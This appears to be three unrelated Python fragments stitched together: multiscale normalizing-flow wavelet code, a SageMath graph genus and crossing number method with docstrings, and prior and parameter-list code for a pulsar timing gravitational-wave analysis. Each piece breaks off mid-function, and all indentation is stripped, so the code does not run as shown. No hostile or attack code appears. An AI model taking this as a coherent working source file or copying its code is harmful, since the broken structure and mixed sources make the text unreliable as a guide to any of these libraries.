stds[0], stds[1] = np.sqrt(1/3) * stds[0], np.sqrt(2/3) * stds[1]
return stds
def std_for_shapes_2d(norm_res, input_shapes):
stds = []
for shape in input_shapes:
stds.append(np.sqrt(3/4**(np.log2(norm_res) - np.log2(shape[1]))))
stds[0] = stds[0]/np.sqrt(3)
if input_shapes[-1][0] == 9 and input_shapes[0] == (1, 1, 1):
stds[0], stds[1] = np.sqrt(1/3) * stds[0], np.sqrt(2/3) * stds[0]
return stds
def combine1d(y, xbar):
xa = xbar + y
xb = xbar - y
y_shape = list(y.shape)
cat_dim = -1 if y_shape[-1] == y_shape[-2] else -2
y_shape[cat_dim] = int(y_shape[cat_dim]*2)
x = torch.cat((xa.unsqueeze(cat_dim), xb.unsqueeze(cat_dim)), dim=cat_dim).reshape(y_shape)
return x
def combine1ch2ch(y1, y2, xbar):
x1 = xbar + y1
x2 = xbar - y1/2 + np.sqrt(3)/2*y2
x3 = xbar - y1/2 - np.sqrt(3)/2*y2
return torch.cat([x1, x2, x3], dim=1)
def combine2d(y1, y2, y3, xbar):
# y1, y2, y3 = y[:, 0:xbar.shape[1]], y[:, xbar.shape[1]:2*xbar.shape[1]], y[:, 2*xbar.shape[1]:3*xbar.shape[1]]
x1 = y1 + xbar
x2 = - 1/3*y1 + 2*np.sqrt(2)/3*y2 + xbar
x3 = - 1/3*y1 - np.sqrt(2)/3*y2 + np.sqrt(6)/3*y3 + xbar
x4 = - 1/3*y1 - np.sqrt(2)/3*y2 - np.sqrt(6)/3*y3 + xbar
x = torch.empty(*xbar.shape[:2], xbar.shape[2]*2, xbar.shape[3]*2).to(xbar)
x[:, :, ::2, ::2] = x1
x[:, :, ::2, 1::2] = x2
x[:, :, 1::2, ::2] = x3
x[:, :, 1::2, 1::2] = x4
return x
def split2d(x):
x1 = x[:, :, ::2, ::2]
x2 = x[:, :, ::2, 1::2]
x3 = x[:, :, 1::2, ::2]
x4 = x[:, :, 1::2, 1::2]
y1 = 3/4*x1 - 1/4*x2 - 1/4*x3 - 1/4*x4
y2 = 2*np.sqrt(2)/4*x2 - np.sqrt(2)/4*(x3 + x4)
y3 = np.sqrt(6)/4*(x3 - x4)
return y1, y2, y3
def split2d_wavelet(x):
x1 = x[:, :, ::2, ::2]
x2 = x[:, :, ::2, 1::2]
x3 = x[:, :, 1::2, ::2]
x4 = x[:, :, 1::2, 1::2]
y1 = 1/2*x1 + 1/2*x2 - 1/2*x3 - 1/2*x4
y2 = 1/2*x1 - 1/2*x2 + 1/2*x3 - 1/2*x4
y3 = 1/2*x1 - 1/2*x2 - 1/2*x3 + 1/2*x4
xbar = 1/4*x1 + 1/4*x2 + 1/4*x3 + 1/4*x4
return y1, y2, y3, xbar
def combine2d_wavelet(y1, y2, y3, xbar):
# y1, y2, y3 = y[:, 0:xbar.shape[1]], y[:, xbar.shape[1]:2*xbar.shape[1]], y[:, 2*xbar.shape[1]:3*xbar.shape[1]]
x1 = y1/2 + y2/2 + y3/2 + xbar
x2 = y1/2 - y2/2 - y3/2 + xbar
x3 = -y1/2 + y2/2 - y3/2 + xbar
x4 = -y1/2 - y2/2 + y3/2 + xbar
x = torch.empty(*xbar.shape[:2], xbar.shape[2]*2, xbar.shape[3]*2).to(xbar)
x[:, :, ::2, ::2] = x1
x[:, :, ::2, 1::2] = x2
x[:, :, 1::2, ::2] = x3
x[:, :, 1::2, 1::2] = x4
return x
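# Hedged sanity check: split2d_wavelet and combine2d_wavelet are exact inverses of
# each other, so an even-sized image should round-trip to floating point accuracy.
# The tensor shape below is an arbitrary illustrative choice.
def _check_wavelet_roundtrip():
    x = torch.randn(2, 3, 8, 8)
    y1, y2, y3, xbar = split2d_wavelet(x)
    assert torch.allclose(combine2d_wavelet(y1, y2, y3, xbar), x, atol=1e-6)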
def split2d_mrcnf(x):
c = math.pow(2, 2/3)
x1 = x[:, :, ::2, ::2]
x2 = x[:, :, ::2, 1::2]
x3 = x[:, :, 1::2, ::2]
x4 = x[:, :, 1::2, 1::2]
y1 = 1/c*x1 + 1/c*x2 - 1/c*x3 - 1/c*x4
y2 = 1/c*x1 - 1/c*x2 + 1/c*x3 - 1/c*x4
y3 = 1/c*x1 - 1/c*x2 - 1/c*x3 + 1/c*x4
xbar = 1/4*x1 + 1/4*x2 + 1/4*x3 + 1/4*x4
return y1, y2, y3, xbar
def combine2d_mrcnf(y1, y2, y3, xbar):
c = math.pow(2, 2/3)
# y1, y2, y3 = y[:, 0:xbar.shape[1]], y[:, xbar.shape[1]:2*xbar.shape[1]], y[:, 2*xbar.shape[1]:3*xbar.shape[1]]
x1 = c*y1/4 + c*y2/4 + c*y3/4 + xbar
x2 = c*y1/4 - c*y2/4 - c*y3/4 + xbar
x3 = -c*y1/4 + c*y2/4 - c*y3/4 + xbar
x4 = -c*y1/4 - c*y2/4 + c*y3/4 + xbar
x = torch.empty(*xbar.shape[:2], xbar.shape[2]*2, xbar.shape[3]*2).to(xbar)
x[:, :, ::2, ::2] = x1
x[:, :, ::2, 1::2] = x2
x[:, :, 1::2, ::2] = x3
x[:, :, 1::2, 1::2] = x4
return x
class CNFMultiscale(nn.Module):
def __init__(self, max_scales=2, factor=0.5, concat_input=True,
mode='image', std_scale=True, joint=False,
regs=argparse.Namespace(kinetic_energy=0.0, jacobian_norm2=0.0),
bn=False, im_ch=3, im_size=32, nbits=8,
dims="64,64,64", strides="1,1,1,1", num_blocks="2,2",
zero_last=True, conv=True, layer_type="concat", nonlinearity="softplus",
time_length=1.0, train_T=False, steer_b=0.0,
div_samples=1, divergence_fn="approximate",
logit=True, alpha=0.05, normal_resolution=64,
solver='bosh3',
disable_cuda=False,
**kwargs):
super().__init__()
self.max_scales = max_scales
self.factor = factor
self.concat_input = concat_input
self.mode = mode
assert self.mode in ['wavelet', 'mrcnf']
self.std_scale = std_scale
self.joint = joint
self.regs = regs
self.bn = bn
self.im_ch, self.im_size, self.nbits = im_ch, im_size, nbits
self.dims, self.strides, self.num_blocks = dims, strides, num_blocks
self.zero_last, self.conv, self.layer_type, self.nonlinearity = zero_last, conv, layer_type, nonlinearity
self.time_length, self.train_T, self.steer_b = time_length, train_T, steer_b
self.div_samples, self.divergence_fn = div_samples, divergence_fn
self.logit, self.alpha = logit, alpha
self.normal_resolution = normal_resolution
self.solver = solver
self.disable_cuda = disable_cuda
self._scale = -1
self.device = torch.device("cuda:%d"%torch.cuda.current_device() if torch.cuda.is_available() and not disable_cuda else "cpu")
self.cvt = lambda x: x.type(torch.float32).to(self.device, non_blocking=True)
# Set image shapes
self.image_shapes = make_image_shapes(max_scales=max_scales, im_size=im_size, im_ch=im_ch, mode=mode)
self.num_scales = len(self.image_shapes)
self.pyramid = Pyramid(image_shapes=self.image_shapes, mode=mode)
MAX = int(np.log2(im_size) + 1)
self.input_shapes = [self.image_shapes[-min(MAX, max_scales)]] + self.image_shapes[-min(MAX, max_scales):-1]
self.input_shapes = [(sh[0] if i==0 else sh[0]*3, sh[1], sh[2]) for i, sh in enumerate(self.input_shapes)]
self.ch1toch3 = False
if max_scales == MAX+1 and im_ch == 3:
self.ch1toch3 = True
self.input_shapes = [(1, 1, 1), (2, 1, 1)] + self.input_shapes[1:]
if self.mode == 'wavelet':
self.z_stds = [np.sqrt(1/4**(np.log2(self.normal_resolution) - np.log2(sh[-1]))) for sh in self.image_shapes] if self.std_scale else [None] * self.num_scales
elif self.mode == 'mrcnf':
c = math.pow(2, 2/3)
self.z_stds = [np.sqrt((1 if s == 0 else c)*1/4**(np.log2(self.normal_resolution) - np.log2(sh[-1]))) for s, sh in enumerate(self.image_shapes)] if self.std_scale else [None] * self.num_scales
self.bns = None
self.coarse_bns = None
if self.concat_input:
self.concat_shapes = [None] + self.image_shapes[:-1]
else:
self.concat_shapes = [None] * len(self.image_shapes)
self.regularization_fns, self.regularization_coeffs = create_regularization_fns(self.regs)
# Create models
models = []
first = True
for input_sh, concat_sh, bl, std in zip(self.input_shapes, self.concat_shapes, self.num_blocks, self.z_stds):
models.append(self.create_model(input_sh, concat_sh, bl, first=first, std=std))
first = False
self.scale_models = nn.ModuleList(models) | |
(0 <= t2 and t2 <= 1):
if p1[1] + t1 * dy == q1[1] or p1[1] + t2 * dy == q2[1]:
return False
else:
t1 = Rational(q1[1] - p1[1]) / dy
t2 = Rational(q2[1] - p1[1]) / dy
if (0 <= t1 and t1 <= 1) or (0 <= t2 and t2 <= 1):
if p1[0] + t1 * dx == q1[0] or p1[0] + t2 * dx == q2[0]:
return False
else:
s = (dx * Rational(q1[1] - p1[1]) + dy * Rational(p1[0] - q1[0])) / (da * dy - db * dx)
t = (da * Rational(p1[1] - q1[1]) + db * Rational(q1[0] - p1[0])) / (db * dx - da * dy)
if 0 <= s and s <= 1 and 0 <= t and t <= 1:
print('fail on', p1, p2, ' : ',q1, q2)
print(edge1, edge2)
return False
return True
def genus(self, set_embedding=True, on_embedding=None, minimal=True, maximal=False, circular=None, ordered=True):
r"""
Return the minimal genus of the graph.
The genus of a compact surface is the number of handles it has. The
genus of a graph is the minimal genus of the surface it can be embedded
into. It can be seen as a measure of non-planarity; a planar graph has
genus zero.
.. NOTE::
This function uses Euler's formula and thus it is necessary to
consider only connected graphs.
INPUT:
- ``set_embedding`` -- boolean (default: ``True``); whether or not to
store an embedding attribute of the computed (minimal) genus of the
graph
- ``on_embedding`` -- two kinds of input are allowed (default:
``None``):
- a dictionary representing a combinatorial embedding on which the
genus should be computed. Note that this must be a valid embedding
for the graph. The dictionary structure is given by: ``vertex1:
[neighbor1, neighbor2, neighbor3], vertex2: [neighbor]`` where there
is a key for each vertex in the graph and a (clockwise) ordered list
of each vertex's neighbors as values. The value of ``on_embedding``
takes precedence over a stored ``_embedding`` attribute if
``minimal`` is set to ``False``.
- The value ``True``, in order to indicate that the embedding stored
as ``_embedding`` should be used (see examples).
- ``minimal`` -- boolean (default: ``True``); whether or not to compute
the minimal genus of the graph (i.e., testing all embeddings). If
minimal is ``False``, then either ``maximal`` must be ``True`` or
``on_embedding`` must not be ``None``. If ``on_embedding`` is not
``None``, it will take priority over ``minimal``. Similarly, if
``maximal`` is ``True``, it will take priority over ``minimal``.
- ``maximal`` -- boolean (default: ``False``); whether or not to compute
the maximal genus of the graph (i.e., testing all embeddings). If
``maximal`` is ``False``, then either ``minimal`` must be ``True`` or
``on_embedding`` must not be ``None``. If ``on_embedding`` is not
``None``, it will take priority over ``maximal``. However, ``maximal``
takes priority over the default ``minimal``.
- ``circular`` -- list (default: ``None``); if ``circular`` is a list of
vertices, the method computes the genus preserving a planar embedding
of this list. If ``circular`` is defined, ``on_embedding`` is not
a valid option.
- ``ordered`` -- boolean (default: ``True``); if ``circular`` is
``True``, then whether or not the boundary order may be permuted
(default is ``True``, which means the boundary order is preserved)
EXAMPLES::
sage: g = graphs.PetersenGraph()
sage: g.genus() # tests for minimal genus by default
1
sage: g.genus(on_embedding=True, maximal=True) # on_embedding overrides minimal and maximal arguments
1
sage: g.genus(maximal=True) # setting maximal to True overrides default minimal=True
3
sage: g.genus(on_embedding=g.get_embedding()) # can also send a valid combinatorial embedding dict
3
sage: (graphs.CubeGraph(3)).genus()
0
sage: K23 = graphs.CompleteBipartiteGraph(2,3)
sage: K23.genus()
0
sage: K33 = graphs.CompleteBipartiteGraph(3,3)
sage: K33.genus()
1
Using the circular argument, we can compute the minimal genus preserving
a planar, ordered boundary::
sage: cube = graphs.CubeGraph(2)
sage: cube.genus(circular=['01','10'])
0
sage: cube.is_circular_planar()
True
sage: cube.genus(circular=['01','10'])
0
sage: cube.genus(circular=['01','10'], on_embedding=True)
Traceback (most recent call last):
...
ValueError: on_embedding is not a valid option when circular is defined
sage: cube.genus(circular=['01','10'], maximal=True)
Traceback (most recent call last):
...
NotImplementedError: cannot compute the maximal genus of a genus respecting a boundary
Note: not everything works for multigraphs, looped graphs or digraphs.
The minimal genus is ultimately computable for every connected graph,
but the embedding we obtain for the simple graph can't be easily
converted to an embedding of a non-simple graph. Also, the maximal
genus of a multigraph does not trivially correspond to that of its
simple graph::
sage: G = DiGraph({0: [0, 1, 1, 1], 1: [2, 2, 3, 3], 2: [1, 3, 3], 3: [0, 3]})
sage: G.genus()
Traceback (most recent call last):
...
NotImplementedError: cannot work with embeddings of non-simple graphs
sage: G.to_simple().genus()
0
sage: G.genus(set_embedding=False)
0
sage: G.genus(maximal=True, set_embedding=False)
Traceback (most recent call last):
...
NotImplementedError: cannot compute the maximal genus of a graph with loops or multiple edges
We break graphs with cut vertices into their blocks, which greatly
speeds up computation of minimal genus. This is not implemented for
maximal genus::
sage: G = graphs.RandomBlockGraph(10, 5)
sage: G.genus()
10
"""
if not self.is_connected():
raise TypeError("the input Graph must be connected to use Euler's Formula to compute minimal genus")
G = self.to_simple(immutable=False)
verts = G.order()
edges = G.size()
if maximal:
minimal = False
if circular is not None:
if not isinstance(circular, list):
raise ValueError("'circular' is expected to be a list")
if maximal:
raise NotImplementedError("cannot compute the maximal genus of a genus respecting a boundary")
if on_embedding is not None:
raise ValueError("on_embedding is not a valid option when circular is defined")
boundary = circular
if hasattr(G, '_embedding'):
del(G._embedding)
extra = G.add_vertex()
G.add_edges((vertex, extra) for vertex in boundary)
verts += 1
extra_edges = []
if ordered: # WHEEL
for e in zip(boundary[:-1], boundary[1:]):
if not G.has_edge(e):
G.add_edge(e)
extra_edges.append(e)
if not G.has_edge(boundary[-1], boundary[0]):
G.add_edge(boundary[-1], boundary[0])
extra_edges.append((boundary[-1], boundary[0]))
# else STAR (empty list of extra edges)
edges = G.size()
if on_embedding is not None:
if self.has_loops() or self.is_directed() or self.has_multiple_edges():
raise NotImplementedError("cannot work with embeddings of non-simple graphs")
if isinstance(on_embedding, dict):
faces = len(self.faces(on_embedding))
return (2 - verts + edges - faces) // 2
elif on_embedding:
try:
faces = len(self.faces(self._embedding))
except AttributeError:
raise AttributeError('graph must have attribute _embedding set to compute current (embedded) genus')
return (2 - verts + edges - faces) // 2
else: # then compute either maximal or minimal genus of all embeddings
from . import genus
if set_embedding:
if self.has_loops() or self.is_directed() or self.has_multiple_edges():
raise NotImplementedError("cannot work with embeddings of non-simple graphs")
if minimal:
B,C = G.blocks_and_cut_vertices()
embedding = {}
g = 0
for block in B:
H = G.subgraph(block)
g += genus.simple_connected_graph_genus(H, set_embedding=True, check=False, minimal=True)
emb = H.get_embedding()
for v in emb:
if v in embedding:
embedding[v] += emb[v]
else:
embedding[v] = emb[v]
self._embedding = embedding
else:
g = genus.simple_connected_graph_genus(G, set_embedding=True, check=False, minimal=minimal)
self._embedding = G._embedding
return g
else:
if maximal and (self.has_multiple_edges() or self.has_loops()):
raise NotImplementedError("cannot compute the maximal genus of a graph with loops or multiple edges")
if minimal:
B,C = G.blocks_and_cut_vertices()
g = 0
for block in B:
H = G.subgraph(block)
g += genus.simple_connected_graph_genus(H, set_embedding=False, check=False, minimal=True)
return g
else:
return genus.simple_connected_graph_genus(G, set_embedding=False, check=False, minimal=minimal)
def crossing_number(self):
r"""
Return the crossing number of the graph.
The crossing number of a graph is the minimum number of edge crossings
needed to draw the graph on a plane. It can be seen as a measure of
non-planarity; a planar graph has crossing number zero.
See the :wikipedia:`Crossing_number` for more information.
EXAMPLES::
sage: P = graphs.PetersenGraph()
sage: P.crossing_number()
2
ALGORITHM:
This is a slow brute force implementation: for every `k` pairs of edges
try adding a new vertex for a crossing point for them. If the result is
not planar in any of those, try `k+1` pairs.
Computing the crossing number is an NP-hard problem.
TESTS:
Empty graph, graph without edges::
sage: E = graphs.EmptyGraph()
| |
'spectrum':
if args.clkPrior == 'uniform':
priorfac_clk = np.sum(np.log(10.0**clk_spec * np.log(10.0)))
elif args.clkPrior == 'loguniform':
priorfac_clk = 0.0
elif not args.incClk:
priorfac_clk = 0.0
if args.incDip:
### powerlaw spectral model ###
if args.dipSpecModel == 'powerlaw':
if args.dipPrior == 'uniform':
priorfac_dip = np.log(Adip * np.log(10.0))
elif args.dipPrior == 'loguniform':
priorfac_dip = 0.0
### free spectral model ###
elif args.dipSpecModel == 'spectrum':
if args.dipPrior == 'uniform':
priorfac_dip = np.sum(np.log(10.0**dip_spec * np.log(10.0)))
elif args.dipPrior == 'loguniform':
priorfac_dip = 0.0
elif not args.incDip:
priorfac_dip = 0.0
if args.incCm:
### powerlaw spectral model ###
if args.cmSpecModel == 'powerlaw':
if args.cmPrior == 'uniform':
priorfac_cm = np.log(Acm * np.log(10.0))
elif args.cmPrior == 'loguniform':
priorfac_cm = 0.0
### free spectral model ###
elif args.cmSpecModel == 'spectrum':
if args.cmPrior == 'uniform':
priorfac_cm = np.sum(np.log(10.0**cm_spec * np.log(10.0)))
elif args.cmPrior == 'loguniform':
priorfac_cm = 0.0
elif not args.incCm:
priorfac_cm = 0.0
if args.incEph and not args.jplBasis:
### powerlaw spectral model ###
if args.ephSpecModel == 'powerlaw':
if args.ephPrior == 'uniform':
priorfac_eph = np.log(Aephx * np.log(10.0)) + \
np.log(Aephy * np.log(10.0)) + \
np.log(Aephz * np.log(10.0))
elif args.ephPrior == 'loguniform':
priorfac_eph = 0.0
### free spectral model ###
elif args.ephSpecModel == 'spectrum':
if args.ephPrior == 'uniform':
priorfac_eph = np.sum(np.log(10.0**eph_spec[0,:] * np.log(10.0))) + \
np.sum(np.log(10.0**eph_spec[1,:] * np.log(10.0))) + \
np.sum(np.log(10.0**eph_spec[2,:] * np.log(10.0)))
elif args.ephPrior == 'loguniform':
priorfac_eph = 0.0
else:
priorfac_eph = 0.0
priorfac_planetmassdelta = 0.0
if args.det_signal and args.eph_planetdelta and \
args.eph_planetmass and args.eph_planetmassprior == 'official':
mu = 0.0
sig = np.array([7.71489350e-12, 4.79352991e-14, 6.31466493e-15,
2.08290722e-15, 1.54976690e-11, 8.17306184e-12,
5.71923361e-11, 7.96103855e-11, 1.50162644e-12])
for jj in range(num_planets):
priorfac_planetmassdelta += np.log( np.exp( -0.5 * (mass_perturb[jj] - mu)**2.0 / sig[jj]**2.0) \
/ np.sqrt(2.0*np.pi*sig[jj]**2.0) )
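# Note (hedged): the log-density above can equivalently be written as
#   -0.5 * ((mass_perturb[jj] - mu) / sig[jj])**2 - 0.5 * np.log(2.0 * np.pi * sig[jj]**2)
# which avoids the exp/log round trip and cannot underflow for large residuals.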
else:
priorfac_planetmassdelta = 0.0
priorfac_ephphysmodel = 0.0
if args.det_signal and args.eph_physmodel:
mu = 0.0
sig = np.array([1.54976690e-11, 8.17306184e-12,
5.71923361e-11, 7.96103855e-11])
for jj in range(len(sig)):
priorfac_ephphysmodel += np.log( np.exp( -0.5 * (eph_physmodel_params[jj+1] - mu)**2.0 / sig[jj]**2.0) \
/ np.sqrt(2.0*np.pi*sig[jj]**2.0) )
if args.incJuporb and args.jup_orbmodel == 'orbelements' and args.eph_priorjpl:
# prior covariance on PCA coefficients from JPL and M. Vallisneri
pca_cov = np.array([[ 3.02523645e-06, 3.97004662e-06, 2.24903984e-07,
-2.66611739e-07, -4.71190041e-08, 1.30078749e-07],
[ 3.97004662e-06, 5.23961306e-06, 3.63693174e-07,
-1.97032683e-07, -1.36506909e-07, 9.00474450e-09],
[ 2.24903984e-07, 3.63693174e-07, 2.39866742e-07,
-2.80080126e-07, -2.31449063e-07, 1.89317437e-07],
[ -2.66611739e-07, -1.97032683e-07, -2.80080126e-07,
9.73091356e-06, 1.04977834e-07, -4.69086192e-06],
[ -4.71190041e-08, -1.36506909e-07, -2.31449063e-07,
1.04977834e-07, 2.37264475e-07, -8.60592321e-08],
[ 1.30078749e-07, 9.00474450e-09, 1.89317437e-07,
-4.69086192e-06, -8.60592321e-08, 6.31390395e-06]])
eph_rv = scistats.multivariate_normal(cov = args.ephpriorjpl_efac**2.0 * pca_cov)
priorfac_ephphysmodel += eph_rv.logpdf(eph_physmodel_params[5:11])
else:
priorfac_ephphysmodel = 0.0
priorfac_roemermix = 0.0
if args.det_signal and args.eph_roemermix and (args.eph_roemerwgts_fix is None):
rmixprior = scistats.dirichlet( (args.eph_dirichlet_alpha * np.ones(num_ephs,dtype=int)).tolist() )
priorfac_roemermix += np.log(rmixprior.pdf(roemer_wgts))
else:
priorfac_roemermix = 0.0
priorfac_corr = 0.0
if args.incGWB and args.incCorr:
if args.gwbTypeCorr == 'modelIndep':
jacobian = np.zeros((npairs,npairs))
if args.corrJacobian == 'full':
ct = 0
for ii in range(len(phi_els)):
for jj in range(len(phi_els[ii])):
dummy_utriang = upper_triang[jj:,ii+1].copy()
dummy_utriang[0] = -np.sin(phi_els[ii][jj]) * dummy_utriang[0] / np.cos(phi_els[ii][jj])
dummy_utriang[1:] = np.cos(phi_els[ii][jj]) * dummy_utriang[1:] / np.sin(phi_els[ii][jj])
dummy_utriang = np.append(np.zeros(len(upper_triang[:jj,ii+1])), dummy_utriang)
deriv = np.zeros_like(upper_triang)
deriv[:,ii+1] = np.dot(upper_triang.T, dummy_utriang)
deriv = deriv + deriv.T
jacobian[:,ct] = deriv[np.triu_indices(npsr,k=1)]
ct += 1
tmp = np.linalg.slogdet(jacobian)
priorfac_corr = 0.5*tmp[1]
elif args.corrJacobian == 'simple':
priorfac_corr = np.sum(np.log(np.abs(np.array([-np.sin(phi_els[ii][0])
for ii in range(len(phi_els))]))))
else:
priorfac_corr = 0.0
### Gaussian prior on modeled psr positions ###
### Currently assumes only one frequency window ###
elif args.gwbTypeCorr == 'psrlocsVary':
priorfac_corr = 0.0
for ii,p in enumerate(psr):
if args.psrlocsPrior == 'normal':
sig = 0.5
priorfac_corr += np.log( np.exp( -0.5 * (varyLocs[ii,0] - p.psr_locs[0])**2.0 / sig**2.0) / \
np.sqrt(2.0*np.pi*sig**2.0) ) + \
np.log( np.exp( -0.5 * (varyLocs[ii,1] - np.pi/2. + p.psr_locs[1])**2.0 / sig**2.0) / \
np.sqrt(2.0*np.pi*sig**2.0) )
elif args.psrlocsPrior == 'uniform':
if np.abs(varyLocs[ii,0] - p.psr_locs[0]) <= 1.0 and \
np.abs(varyLocs[ii,1] - np.pi/2. + p.psr_locs[1]) <= 1.0:
priorfac_corr += 0.0
else:
priorfac_corr += -np.inf
else:
priorfac_corr = 0.0
else:
priorfac_corr = 0.0
elif not args.incGWB and not args.incCorr:
priorfac_corr = 0.0
### Reweighting corr-vs-uncorr GWB models ###
### to ensure proper mixing ###
priorfac_gwbmod = 0.0
if args.incGWB and args.incCorr and args.gwbModelSelect:
if gwb_modindex == 0:
priorfac_gwbmod = ( np.log( args.gwbCorrModWgt / (1.0 + args.gwbCorrModWgt) )
- np.log(1.0/2.0) )
elif gwb_modindex == 1:
priorfac_gwbmod = ( np.log( 1.0 / (1.0 + args.gwbCorrModWgt) )
- np.log(1.0/2.0) )
### Jacobian and prior on cgw properties ###
if args.det_signal:
if args.cgw_search:
### uniform prior ###
if args.cgwPrior == 'uniform':
priorfac_detsig = np.log(hstrain * np.log(10.0))
elif args.cgwPrior == 'loguniform':
priorfac_detsig = 0.0
### pulsar distance prior ###
if args.psrTerm:
for ii, p in enumerate(psr):
mu = p.h5Obj['pdist'].value
sig = p.h5Obj['pdistErr'].value
priorfac_detsig += \
np.log( np.exp( -0.5 * (psrdists[ii] - mu)**2.0 / sig**2.0) / \
np.sqrt(2.0*np.pi*sig**2.0) )
else:
priorfac_detsig = 0.0
elif not args.det_signal:
priorfac_detsig = 0.0
#####################################
# Finally, return the log-likelihood
return (1.0/args.softParam) * (logLike + priorfac_gwb + priorfac_gwbmod + priorfac_gwline + \
priorfac_red + priorfac_dm + priorfac_clk + priorfac_cm + \
priorfac_eph + priorfac_planetmassdelta + priorfac_ephphysmodel + \
priorfac_roemermix + priorfac_band + priorfac_dip + \
priorfac_corr + priorfac_detsig)
#########################
#########################
# Set up the parameter list
parameters=[]
if not args.fixRed:
if args.redSpecModel == 'powerlaw':
[parameters.append('Ared_'+p.name) for p in psr]
[parameters.append('gam_red_'+p.name) for p in psr]
elif args.redSpecModel == 'spectrum':
for ii in range(len(psr)):
for jj in range(nmodes_red):
parameters.append('redSpec'+'_{0}_'.format(jj+1)+psr[ii].name)
if args.incDM and not args.fixDM:
if args.dmSpecModel == 'powerlaw':
[parameters.append('Adm_'+p.name) for p in psr]
[parameters.append('gam_dm_'+p.name) for p in psr]
elif args.dmSpecModel == 'spectrum':
for ii in range(len(psr)):
for jj in range(nmodes_dm):
parameters.append('dmSpec'+'_{0}_'.format(jj+1)+psr[ii].name)
if args.varyWhite:
for ii,p in enumerate(psr):
systems = p.sysflagdict[args.sysflag_target]
for jj in range(len(systems)):
parameters.append('EFAC_'+p.name+'_'+systems.keys()[jj])
for jj in range(len(systems)):
parameters.append('EQUAD_'+p.name+'_'+systems.keys()[jj])
if 'nano-f' in p.sysflagdict.keys() and len(p.sysflagdict['nano-f'].keys())>0:
for jj,nano_sysname in enumerate(p.sysflagdict['nano-f'].keys()):
parameters.append('ECORR_'+p.name+'_'+nano_sysname)
if args.incBand:
if args.bandSpecModel == 'powerlaw':
parameters += ['Aband_'+str(ii) for ii in range(len(bands)-1)]
parameters += ['gam_band_'+str(ii) for ii in range(len(bands)-1)]
elif args.bandSpecModel == 'spectrum':
for ii in range(len(bands)-1):
for jj in range(nmodes_band):
parameters.append('bandSpec_band'+str(ii)+'_mode'+str(jj))
if args.incClk:
if args.clkSpecModel == 'powerlaw':
parameters += ['Aclk', 'gam_clk']
elif args.clkSpecModel == 'spectrum':
for jj in range(nmodes_red):
parameters.append('clkSpec'+'_{0}'.format(jj+1))
if args.incCm:
if args.cmSpecModel == 'powerlaw':
parameters += ['Acm', 'gam_cm']
elif args.cmSpecModel == 'spectrum':
for jj in range(nmodes_red):
parameters.append('cmSpec'+'_{0}'.format(jj+1))
if args.incEph and not args.jplBasis:
if args.ephSpecModel == 'powerlaw':
parameters += ['Aephx', 'Aephy', 'Aephz']
parameters += ['gam_ephx', 'gam_ephy', 'gam_ephz']
elif args.ephSpecModel == 'spectrum':
for jj in range(nmodes_eph):
parameters.append('ephxSpec'+'_{0}'.format(jj+1))
for jj in range(nmodes_eph):
parameters.append('ephySpec'+'_{0}'.format(jj+1))
for jj in range(nmodes_eph):
parameters.append('ephzSpec'+'_{0}'.format(jj+1))
if args.incDip:
if args.dipSpecModel == 'powerlaw':
parameters += ['Adip', 'gam_dip']
elif args.dipSpecModel == 'spectrum':
for jj in range(nmodes_red):
parameters.append('dipSpec'+'_{0}'.format(jj+1))
if args.incGWB:
if args.gwbSpecModel == 'powerlaw':
parameters.append("Agwb")
if args.fix_slope is None:
parameters.append("gam_gwb")
elif args.gwbSpecModel == 'spectrum':
for ii in range(nmodes_red):
parameters.append('gwbSpec_{0}'.format(ii+1))
if args.gwbPrior == 'gaussProc':
if gwb_popparam == 'starsecc':
parameters += ["Agwb","stars","ecc"]
elif gwb_popparam == 'alphastarsecc':
parameters += ["Agwb","alpha","stars","ecc"]
elif gwb_popparam == 'cosmicstring':
parameters += ["Agwb","Gmu","p"]
else:
parameters += ["Agwb",gwb_popparam]
elif args.gwbSpecModel == 'turnover':
parameters += ["Agwb"]
if args.gwb_fb2env is not None:
parameters += [args.gwb_fb2env]
        else:
parameters += ["kappa", "fbend"]
elif args.gwbSpecModel == 'gpEnvInterp':
parameters += ["Agwb", "ecc"]
if args.incCorr:
if args.gwbTypeCorr == 'modelIndep':
for ii in range(tmp_nwins):
for jj in range(int(len(psr)*(len(psr)-1)/2)):
parameters.append('phi_corr_win{0}_val{1}'.format(ii+1,jj+1))
elif args.gwbTypeCorr == 'pointSrc':
if args.fixPointSrcPhi is None and args.fixPointSrcTheta is None:
for ii in range(tmp_nwins):
parameters += ["gwb_phi_win{0}".format(ii+1),
"gwb_costheta_win{0}".format(ii+1)]
elif args.gwbTypeCorr == 'spharmAnis':
for ii in range(tmp_nwins):
for jj in range((args.LMAX+1)**2 - 1):
parameters.append('clm_win{0}_val{1}'.format(ii+1,jj+1))
elif args.gwbTypeCorr == 'dipoleOrf':
for ii in range(tmp_nwins):
parameters += ["gwdip_phi_win{0}".format(ii+1),
"gwdip_costheta_win{0}".format(ii+1),
"gwdip_wgt_win{0}".format(ii+1)]
elif args.gwbTypeCorr == 'gwDisk':
for ii in range(tmp_nwins):
parameters += ["gwdisk_phi_win{0}".format(ii+1),
"gwdisk_costheta_win{0}".format(ii+1),
"gwdisk_radius_win{0}".format(ii+1),
"gwdisk_wgt_win{0}".format(ii+1)]
elif args.gwbTypeCorr == 'psrlocsVary':
for ii in range(tmp_nwins):
for jj in range(len(psr)):
parameters.append("gwphi_win{0}_psr{1}".format(ii+1,jj+1))
for ii in range(tmp_nwins):
for jj in range(len(psr)):
parameters.append("gwctheta_win{0}_psr{1}".format(ii+1,jj+1))
if args.gwbModelSelect:
parameters.append("gwb_modindex")
if args.incGWline:
parameters += ["spec_gwline", "freq_gwline",
"phi_gwline", "costheta_gwline"]
if args.det_signal:
if args.cgw_search:
parameters += ["chirpmass", "qratio", "dist", "h_strain", "orb-freq",
"phi", "costheta", "cosiota", "gwpol", "gwgamma", "l0"]
if args.ecc_search:
parameters.append("ecc")
if args.psrTerm:
[parameters.append('pdist_'+p.name) for p in psr]
[parameters.append('gp0_'+p.name) for p in psr]
[parameters.append('lp0_'+p.name) for p in psr]
if args.cgwModelSelect:
parameters.append("nmodel_cgw")
if args.bwm_search:
parameters += ["burst_mjd", "burst_strain",
"phi", "costheta", "gwpol"]
if args.bwm_model_select:
parameters.append("nmodel_bwm")
if args.eph_quadratic:
parameters += ["eph_xquad0amp", "eph_xquad1amp", "eph_xquad2amp",
"eph_yquad0amp", "eph_yquad1amp", "eph_yquad2amp",
"eph_zquad0amp", "eph_zquad1amp", "eph_zquad2amp"]
#parameters += ["eph_xquad1amp", "eph_xquad2amp", "eph_yquad1amp",
# "eph_yquad2amp", "eph_zquad1amp", "eph_zquad2amp",
